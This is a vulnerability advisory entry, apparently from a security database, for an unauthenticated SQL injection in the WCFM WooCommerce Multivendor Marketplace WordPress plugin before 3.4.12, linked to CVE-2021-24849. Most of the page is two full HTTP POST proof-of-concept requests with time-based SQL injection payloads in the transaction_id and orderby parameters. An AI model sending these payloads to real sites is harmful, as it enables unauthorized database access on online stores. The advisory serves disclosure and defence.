Lucene search
JrXnmWPEX-ID:763C08A0-4B2B-4487-B91C-BE6CC2B9322EHistoryNov 22, 2021 - 12:00 a.m.
WCFM - WooCommerce Multivendor Marketplace < 3.4.12 - Unauthenticated SQL Injection
2021-11-2200:00:00
JrXnm
128
0.024 Low
EPSS
Percentile
89.9%
The wcfm_ajax_controller AJAX action of the plugin, available to unauthenticated and authenticated user, does not properly sanitise multiple parameters before using them in SQL statements, leading to SQL injections
v < 3.4.11
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: [any authenticated user]
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1+union+select+1+and+sleep(10)--
v < 3.4.12
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: [any authenticated user]
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 145
action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1&orderby=ID`%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)--%20`Related
prion
prion
Sql injection
2021-12-21 09:15:00
patchstack
patchstack
nvd
nvd
CVE-2021-24849
2021-12-21 09:15:07
wpvulndb
wpvulndb
cnvd
cnvd
WordPress WooCommerce Multivendor Marketplace SQL Injection Vulnerability
2021-12-26 00:00:00
cvelist
cvelist
nuclei
nuclei
WCFM WooCommerce Multivendor Marketplace < 3.4.12 - SQL Injection
2024-02-13 04:02:40
cve
cve
CVE-2021-24849
2021-12-21 09:15:07